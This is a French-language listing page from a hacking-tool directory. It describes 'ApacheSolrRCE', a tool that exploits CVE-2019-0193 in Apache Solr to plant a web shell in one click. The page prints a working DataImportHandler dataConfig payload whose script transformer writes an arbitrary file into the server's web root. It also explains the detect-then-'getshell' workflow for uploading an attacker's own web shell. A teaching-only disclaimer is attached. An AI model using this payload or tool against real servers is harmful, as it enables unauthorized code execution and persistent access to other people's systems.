Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
ApacheSolrRCE — ApacheSolrRCE(CVE-2019-0193)一键写shell,原理是通过代码执行的java文件流写的马。 | Kitploit
Outils/GitHubGitHub/freefv/apachesolrrce
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubfreefv/apachesolrrce

ApacheSolrRCE

ApacheSolrRCE(CVE-2019-0193)一键写shell,原理是通过代码执行的java文件流写的马。

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Déclaration du projet

À utiliser uniquement pour l'enseignement et l'échange en sécurité de l'information, ne pas l'utiliser pour des tests ou des attaques illégaux.

ApacheSolrRCE

ApacheSolrRCE (CVE-2019-0193) écrit un shell en un clic, le principe est d'écrire un cheval (web shell) via un flux de fichiers Java exécuté par du code.

Note : l'auteur est encore novice, si vous avez un bug ou d'autres besoins, veuillez télécharger le code et le modifier vous-même.

Description de l'outil

Étant donné que les payloads circulant sur Internet sont toutes des exécutions de commandes et qu'il n'est pas pratique d'obtenir un webshell, j'ai donc écrit ce payload (lorsque 123456 est renvoyé, cela signifie que l'écriture a réussi).

Note : L'outil ne peut aider que pour les tests, si l'outil n'arrive pas à écrire, il est recommandé de le faire manuellement.

root@kitploit:~
<dataConfig>
<dataSource name="streamsrc" type="ContentStreamDataSource" loggerLevel="TRACE" />
  <script><![CDATA[
          function poc(row){
var buf = new java.io.BufferedWriter(new java.io.FileWriter(java.net.URLDecoder.decode(java.lang.Thread.currentThread().getContextClassLoader().getResource("").getPath().toString().replaceAll("file:\/", "").split("WEB-INF")[0]+"1.txt")));buf.write(new java.lang.String(java.util.Base64.getDecoder().decode("MTIzNDU2")));buf.close();
row.put("title",123456);
return row;

}

]]></script>

<document>
    <entity
        stream="true"
        name="entity1"
        datasource="streamsrc1"
        processor="XPathEntityProcessor"
        rootEntity="true"
        forEach="/RDF/item"
        transformer="script:poc">
             <field column="title" xpath="/RDF/item/title" />
    </entity>
</document>
</dataConfig>

Utilisation de l'outil

Cliquez d'abord sur Détection pour obtenir le core et déterminer s'il existe une vulnérabilité.

Puis cliquez sur getshell.

Note : Placez votre webshell dans le répertoire shell, l'outil chargera automatiquement votre webshell dans la liste déroulante.

Le proxy par défaut est un proxy HTTP, le port est 8080, c'est codé en dur dans le code, si nécessaire, compilez et modifiez vous-même.

Remerciements particuliers

solr_exploit

Télécharger l’outil